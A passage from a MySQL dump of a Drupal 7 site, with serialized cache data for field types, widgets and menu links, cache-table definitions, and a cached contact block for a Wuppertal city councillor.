jpeg\";s:12:\"max_filesize\";s:0:\"\";s:14:\"max_resolution\";s:0:\"\";s:14:\"min_resolution\";s:0:\"\";s:9:\"alt_field\";b:1;s:11:\"title_field\";s:0:\"\";s:13:\"default_image\";i:0;s:18:\"user_register_form\";b:0;}s:6:\"widget\";a:4:{s:4:\"type\";s:11:\"image_image\";s:8:\"settings\";a:2:{s:18:\"progress_indicator\";s:8:\"throbber\";s:19:\"preview_image_style\";s:9:\"thumbnail\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:5:\"large\";s:10:\"image_link\";s:0:\"\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:6:\"medium\";s:10:\"image_link\";s:7:\"content\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}}s:2:\"id\";s:1:\"6\";s:8:\"field_id\";s:1:\"4\";s:10:\"field_name\";s:11:\"field_image\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";}}s:4:\"page\";a:1:{s:4:\"body\";a:13:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"2\";s:8:\"field_id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:4:\"page\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}}}s:4:\"file\";a:1:{s:4:\"file\";a:0:{}}s:13:\"taxonomy_term\";a:1:{s:4:\"tags\";a:0:{}}s:19:\"taxonomy_vocabulary\";a:1:{s:19:\"taxonomy_vocabulary\";a:0:{}}s:4:\"user\";a:1:{s:4:\"user\";a:0:{}}}',0,1423659086,1),('field_info_types:en','a:4:{s:11:\"field types\";a:13:{s:4:\"file\";a:7:{s:5:\"label\";s:4:\"File\";s:11:\"description\";s:55:\"This field stores the ID of a file as an integer value.\";s:8:\"settings\";a:3:{s:13:\"display_field\";i:0;s:15:\"display_default\";i:0;s:10:\"uri_scheme\";s:6:\"public\";}s:17:\"instance_settings\";a:5:{s:15:\"file_extensions\";s:3:\"txt\";s:14:\"file_directory\";s:0:\"\";s:12:\"max_filesize\";s:0:\"\";s:17:\"description_field\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:12:\"file_generic\";s:17:\"default_formatter\";s:12:\"file_default\";s:6:\"module\";s:4:\"file\";}s:5:\"image\";a:7:{s:5:\"label\";s:5:\"Image\";s:11:\"description\";s:62:\"This field stores the ID of an image file as an integer value.\";s:8:\"settings\";a:2:{s:10:\"uri_scheme\";s:6:\"public\";s:13:\"default_image\";i:0;}s:17:\"instance_settings\";a:9:{s:15:\"file_extensions\";s:16:\"png gif jpg jpeg\";s:14:\"file_directory\";s:0:\"\";s:12:\"max_filesize\";s:0:\"\";s:9:\"alt_field\";i:0;s:11:\"title_field\";i:0;s:14:\"max_resolution\";s:0:\"\";s:14:\"min_resolution\";s:0:\"\";s:13:\"default_image\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:11:\"image_image\";s:17:\"default_formatter\";s:5:\"image\";s:6:\"module\";s:5:\"image\";}s:12:\"list_integer\";a:7:{s:5:\"label\";s:14:\"List (integer)\";s:11:\"description\";s:144:\"This field stores integer values from a list of allowed \'value => label\' pairs, i.e. \'Lifetime in days\': 1 => 1 day, 7 => 1 week, 31 => 1 month.\";s:8:\"settings\";a:2:{s:14:\"allowed_values\";a:0:{}s:23:\"allowed_values_function\";s:0:\"\";}s:14:\"default_widget\";s:14:\"options_select\";s:17:\"default_formatter\";s:12:\"list_default\";s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:4:\"list\";}s:10:\"list_float\";a:7:{s:5:\"label\";s:12:\"List (float)\";s:11:\"description\";s:134:\"This field stores float values from a list of allowed \'value => label\' pairs, i.e. \'Fraction\': 0 => 0, .25 => 1/4, .75 => 3/4, 1 => 1.\";s:8:\"settings\";a:2:{s:14:\"allowed_values\";a:0:{}s:23:\"allowed_values_function\";s:0:\"\";}s:14:\"default_widget\";s:14:\"options_select\";s:17:\"default_formatter\";s:12:\"list_default\";s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:4:\"list\";}s:9:\"list_text\";a:7:{s:5:\"label\";s:11:\"List (text)\";s:11:\"description\";s:137:\"This field stores text values from a list of allowed \'value => label\' pairs, i.e. \'US States\': IL => Illinois, IA => Iowa, IN => Indiana.\";s:8:\"settings\";a:2:{s:14:\"allowed_values\";a:0:{}s:23:\"allowed_values_function\";s:0:\"\";}s:14:\"default_widget\";s:14:\"options_select\";s:17:\"default_formatter\";s:12:\"list_default\";s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:4:\"list\";}s:12:\"list_boolean\";a:7:{s:5:\"label\";s:7:\"Boolean\";s:11:\"description\";s:50:\"This field stores simple on/off or yes/no options.\";s:8:\"settings\";a:2:{s:14:\"allowed_values\";a:0:{}s:23:\"allowed_values_function\";s:0:\"\";}s:14:\"default_widget\";s:15:\"options_buttons\";s:17:\"default_formatter\";s:12:\"list_default\";s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:4:\"list\";}s:14:\"number_integer\";a:7:{s:5:\"label\";s:7:\"Integer\";s:11:\"description\";s:57:\"This field stores a number in the database as an integer.\";s:17:\"instance_settings\";a:5:{s:3:\"min\";s:0:\"\";s:3:\"max\";s:0:\"\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:6:\"number\";s:17:\"default_formatter\";s:14:\"number_integer\";s:8:\"settings\";a:0:{}s:6:\"module\";s:6:\"number\";}s:14:\"number_decimal\";a:7:{s:5:\"label\";s:7:\"Decimal\";s:11:\"description\";s:69:\"This field stores a number in the database in a fixed decimal format.\";s:8:\"settings\";a:3:{s:9:\"precision\";i:10;s:5:\"scale\";i:2;s:17:\"decimal_separator\";s:1:\".\";}s:17:\"instance_settings\";a:5:{s:3:\"min\";s:0:\"\";s:3:\"max\";s:0:\"\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:6:\"number\";s:17:\"default_formatter\";s:14:\"number_decimal\";s:6:\"module\";s:6:\"number\";}s:12:\"number_float\";a:7:{s:5:\"label\";s:5:\"Float\";s:11:\"description\";s:70:\"This field stores a number in the database in a floating point format.\";s:8:\"settings\";a:1:{s:17:\"decimal_separator\";s:1:\".\";}s:17:\"instance_settings\";a:5:{s:3:\"min\";s:0:\"\";s:3:\"max\";s:0:\"\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:6:\"number\";s:17:\"default_formatter\";s:14:\"number_decimal\";s:6:\"module\";s:6:\"number\";}s:23:\"taxonomy_term_reference\";a:7:{s:5:\"label\";s:14:\"Term reference\";s:11:\"description\";s:49:\"This field stores a reference to a taxonomy term.\";s:14:\"default_widget\";s:14:\"options_select\";s:17:\"default_formatter\";s:28:\"taxonomy_term_reference_link\";s:8:\"settings\";a:1:{s:14:\"allowed_values\";a:1:{i:0;a:2:{s:10:\"vocabulary\";s:0:\"\";s:6:\"parent\";s:1:\"0\";}}}s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:8:\"taxonomy\";}s:4:\"text\";a:7:{s:5:\"label\";s:4:\"Text\";s:11:\"description\";s:47:\"This field stores varchar text in the database.\";s:8:\"settings\";a:1:{s:10:\"max_length\";i:255;}s:17:\"instance_settings\";a:2:{s:15:\"text_processing\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:14:\"text_textfield\";s:17:\"default_formatter\";s:12:\"text_default\";s:6:\"module\";s:4:\"text\";}s:9:\"text_long\";a:7:{s:5:\"label\";s:9:\"Long text\";s:11:\"description\";s:44:\"This field stores long text in the database.\";s:17:\"instance_settings\";a:2:{s:15:\"text_processing\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:13:\"text_textarea\";s:17:\"default_formatter\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}s:17:\"text_with_summary\";a:7:{s:5:\"label\";s:21:\"Long text and summary\";s:11:\"description\";s:77:\"This field stores long text in the database along with optional summary text.\";s:17:\"instance_settings\";a:3:{s:15:\"text_processing\";i:1;s:15:\"display_summary\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:26:\"text_textarea_with_summary\";s:17:\"default_formatter\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:12:\"widget types\";a:10:{s:21:\"taxonomy_autocomplete\";a:5:{s:5:\"label\";s:34:\"Autocomplete term widget (tagging)\";s:11:\"field types\";a:1:{i:0;s:23:\"taxonomy_term_reference\";}s:8:\"settings\";a:2:{s:4:\"size\";i:60;s:17:\"autocomplete_path\";s:21:\"taxonomy/autocomplete\";}s:9:\"behaviors\";a:1:{s:15:\"multiple values\";i:4;}s:6:\"module\";s:8:\"taxonomy\";}s:14:\"text_textfield\";a:4:{s:5:\"label\";s:10:\"Text field\";s:11:\"field types\";a:1:{i:0;s:4:\"text\";}s:8:\"settings\";a:1:{s:4:\"size\";i:60;}s:6:\"module\";s:4:\"text\";}s:13:\"text_textarea\";a:4:{s:5:\"label\";s:25:\"Text area (multiple rows)\";s:11:\"field types\";a:1:{i:0;s:9:\"text_long\";}s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"module\";s:4:\"text\";}s:26:\"text_textarea_with_summary\";a:4:{s:5:\"label\";s:24:\"Text area with a summary\";s:11:\"field types\";a:1:{i:0;s:17:\"text_with_summary\";}s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"module\";s:4:\"text\";}s:13:\"options_onoff\";a:5:{s:5:\"label\";s:22:\"Single on/off checkbox\";s:11:\"field types\";a:1:{i:0;s:12:\"list_boolean\";}s:9:\"behaviors\";a:1:{s:15:\"multiple values\";i:4;}s:8:\"settings\";a:1:{s:13:\"display_label\";i:0;}s:6:\"module\";s:7:\"options\";}s:15:\"options_buttons\";a:5:{s:5:\"label\";s:25:\"Check boxes/radio buttons\";s:11:\"field types\";a:5:{i:0;s:12:\"list_integer\";i:1;s:10:\"list_float\";i:2;s:9:\"list_text\";i:3;s:12:\"list_boolean\";i:4;s:23:\"taxonomy_term_reference\";}s:9:\"behaviors\";a:1:{s:15:\"multiple values\";i:4;}s:8:\"settings\";a:0:{}s:6:\"module\";s:7:\"options\";}s:11:\"image_image\";a:5:{s:5:\"label\";s:5:\"Image\";s:11:\"field types\";a:1:{i:0;s:5:\"image\";}s:8:\"settings\";a:2:{s:18:\"progress_indicator\";s:8:\"throbber\";s:19:\"preview_image_style\";s:9:\"thumbnail\";}s:9:\"behaviors\";a:2:{s:15:\"multiple values\";i:4;s:13:\"default value\";i:1;}s:6:\"module\";s:5:\"image\";}s:6:\"number\";a:4:{s:5:\"label\";s:10:\"Text field\";s:11:\"field types\";a:3:{i:0;s:14:\"number_integer\";i:1;s:14:\"number_decimal\";i:2;s:12:\"number_float\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:6:\"number\";}s:14:\"options_select\";a:5:{s:5:\"label\";s:11:\"Select list\";s:11:\"field types\";a:4:{i:0;s:12:\"list_integer\";i:1;s:10:\"list_float\";i:2;s:9:\"list_text\";i:3;s:23:\"taxonomy_term_reference\";}s:9:\"behaviors\";a:1:{s:15:\"multiple values\";i:4;}s:8:\"settings\";a:0:{}s:6:\"module\";s:7:\"options\";}s:12:\"file_generic\";a:5:{s:5:\"label\";s:4:\"File\";s:11:\"field types\";a:1:{i:0;s:4:\"file\";}s:8:\"settings\";a:1:{s:18:\"progress_indicator\";s:8:\"throbber\";}s:9:\"behaviors\";a:2:{s:15:\"multiple values\";i:4;s:13:\"default value\";i:1;}s:6:\"module\";s:4:\"file\";}}s:15:\"formatter types\";a:16:{s:12:\"file_default\";a:4:{s:5:\"label\";s:12:\"Generic file\";s:11:\"field types\";a:1:{i:0;s:4:\"file\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"file\";}s:10:\"file_table\";a:4:{s:5:\"label\";s:14:\"Table of files\";s:11:\"field types\";a:1:{i:0;s:4:\"file\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"file\";}s:14:\"file_url_plain\";a:4:{s:5:\"label\";s:11:\"URL to file\";s:11:\"field types\";a:1:{i:0;s:4:\"file\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"file\";}s:5:\"image\";a:4:{s:5:\"label\";s:5:\"Image\";s:11:\"field types\";a:1:{i:0;s:5:\"image\";}s:8:\"settings\";a:2:{s:11:\"image_style\";s:0:\"\";s:10:\"image_link\";s:0:\"\";}s:6:\"module\";s:5:\"image\";}s:12:\"list_default\";a:4:{s:5:\"label\";s:7:\"Default\";s:11:\"field types\";a:4:{i:0;s:12:\"list_integer\";i:1;s:10:\"list_float\";i:2;s:9:\"list_text\";i:3;s:12:\"list_boolean\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"list\";}s:8:\"list_key\";a:4:{s:5:\"label\";s:3:\"Key\";s:11:\"field types\";a:4:{i:0;s:12:\"list_integer\";i:1;s:10:\"list_float\";i:2;s:9:\"list_text\";i:3;s:12:\"list_boolean\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"list\";}s:14:\"number_integer\";a:4:{s:5:\"label\";s:7:\"Default\";s:11:\"field types\";a:1:{i:0;s:14:\"number_integer\";}s:8:\"settings\";a:4:{s:18:\"thousand_separator\";s:1:\" \";s:17:\"decimal_separator\";s:1:\".\";s:5:\"scale\";i:0;s:13:\"prefix_suffix\";b:1;}s:6:\"module\";s:6:\"number\";}s:14:\"number_decimal\";a:4:{s:5:\"label\";s:7:\"Default\";s:11:\"field types\";a:2:{i:0;s:14:\"number_decimal\";i:1;s:12:\"number_float\";}s:8:\"settings\";a:4:{s:18:\"thousand_separator\";s:1:\" \";s:17:\"decimal_separator\";s:1:\".\";s:5:\"scale\";i:2;s:13:\"prefix_suffix\";b:1;}s:6:\"module\";s:6:\"number\";}s:18:\"number_unformatted\";a:4:{s:5:\"label\";s:11:\"Unformatted\";s:11:\"field types\";a:3:{i:0;s:14:\"number_integer\";i:1;s:14:\"number_decimal\";i:2;s:12:\"number_float\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:6:\"number\";}s:28:\"taxonomy_term_reference_link\";a:4:{s:5:\"label\";s:4:\"Link\";s:11:\"field types\";a:1:{i:0;s:23:\"taxonomy_term_reference\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:29:\"taxonomy_term_reference_plain\";a:4:{s:5:\"label\";s:10:\"Plain text\";s:11:\"field types\";a:1:{i:0;s:23:\"taxonomy_term_reference\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:36:\"taxonomy_term_reference_rss_category\";a:4:{s:5:\"label\";s:12:\"RSS category\";s:11:\"field types\";a:1:{i:0;s:23:\"taxonomy_term_reference\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:12:\"text_default\";a:4:{s:5:\"label\";s:7:\"Default\";s:11:\"field types\";a:3:{i:0;s:4:\"text\";i:1;s:9:\"text_long\";i:2;s:17:\"text_with_summary\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}s:10:\"text_plain\";a:4:{s:5:\"label\";s:10:\"Plain text\";s:11:\"field types\";a:3:{i:0;s:4:\"text\";i:1;s:9:\"text_long\";i:2;s:17:\"text_with_summary\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}s:12:\"text_trimmed\";a:4:{s:5:\"label\";s:7:\"Trimmed\";s:11:\"field types\";a:3:{i:0;s:4:\"text\";i:1;s:9:\"text_long\";i:2;s:17:\"text_with_summary\";}s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";}s:23:\"text_summary_or_trimmed\";a:4:{s:5:\"label\";s:18:\"Summary or trimmed\";s:11:\"field types\";a:1:{i:0;s:17:\"text_with_summary\";}s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";}}s:13:\"storage types\";a:1:{s:17:\"field_sql_storage\";a:4:{s:5:\"label\";s:19:\"Default SQL storage\";s:11:\"description\";s:64:\"Stores fields in the local SQL database, using per-field tables.\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";}}}',0,1423658787,1); /*!40000 ALTER TABLE `dpl_cache_field` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_filter` -- DROP TABLE IF EXISTS `dpl_cache_filter`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_filter` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the Filter module to store already...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_filter` -- LOCK TABLES `dpl_cache_filter` WRITE; /*!40000 ALTER TABLE `dpl_cache_filter` DISABLE KEYS */; INSERT INTO `dpl_cache_filter` VALUES ('filtered_html::9297f1178309d206e0216ce366d7719f1819e3cd83c9e7437229d70d1141e914','

                                Stadtverordneter
                                \nOliver Graf
                                \nJohannes-Rau-Platz 1
                                \n42275 Wuppertal
                                \neMail: ollirat@ollital.de
                                \nTwitter: @OlliTal

                                \n',0,1423658787,0); /*!40000 ALTER TABLE `dpl_cache_filter` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_form` -- DROP TABLE IF EXISTS `dpl_cache_form`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_form` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the form system to store recently built...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_form` -- LOCK TABLES `dpl_cache_form` WRITE; /*!40000 ALTER TABLE `dpl_cache_form` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_cache_form` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_image` -- DROP TABLE IF EXISTS `dpl_cache_image`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_image` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table used to store information about image...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_image` -- LOCK TABLES `dpl_cache_image` WRITE; /*!40000 ALTER TABLE `dpl_cache_image` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_cache_image` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_menu` -- DROP TABLE IF EXISTS `dpl_cache_menu`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_menu` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the menu system to store router...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_menu` -- LOCK TABLES `dpl_cache_menu` WRITE; /*!40000 ALTER TABLE `dpl_cache_menu` DISABLE KEYS */; INSERT INTO `dpl_cache_menu` VALUES ('links:main-menu:all:0:en:0','a:2:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;}',0,1423658892,1),('links:main-menu:page:admin/config/people/accounts:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658967,1),('links:main-menu:page:admin/config/user-interface/shortcut/shortcut-set-1:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659127,1),('links:main-menu:page:admin/config:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658962,1),('links:main-menu:page:admin/content:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658880,1),('links:main-menu:page:admin/dashboard:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423775242,1),('links:main-menu:page:admin/modules:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658761,1),('links:main-menu:page:admin/people/permissions:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658773,1),('links:main-menu:page:admin/people:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658781,1),('links:main-menu:page:admin/reports/dblog:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659033,1),('links:main-menu:page:admin/reports/fields:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659086,1),('links:main-menu:page:admin/reports/hits:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659098,1),('links:main-menu:page:admin/reports/updates/update:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1426848142,1),('links:main-menu:page:admin/reports/visitors:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659117,1),('links:main-menu:page:admin/reports:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659027,1),('links:main-menu:page:admin/structure/block/manage/block/1/configure:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1424617194,1),('links:main-menu:page:admin/structure/contact:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658794,1),('links:main-menu:page:admin/structure/menu/manage/navigation/list:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659147,1),('links:main-menu:page:node/2/edit:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658929,1),('links:main-menu:page:node/2/track:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659004,1),('links:main-menu:page:node/2:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658921,1),('links:main-menu:page:node/5/edit:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:311;s:3:\"311\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:311;s:3:\"311\";}}',0,1423775026,1),('links:main-menu:page:node/5/edit:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:2:{i:0;i:0;i:311;s:3:\"311\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:311;s:3:\"311\";}}',0,1423775026,1),('links:main-menu:page:node/5/track:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:311;s:3:\"311\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:311;s:3:\"311\";}}',0,1423659018,1),('links:main-menu:page:node/5/track:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:2:{i:0;i:0;i:311;s:3:\"311\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:311;s:3:\"311\";}}',0,1423659018,1),('links:main-menu:page:node/5:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:311;s:3:\"311\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:311;s:3:\"311\";}}',0,1423659015,1),('links:main-menu:page:node/5:en:1:1','a:4:{s:9:\"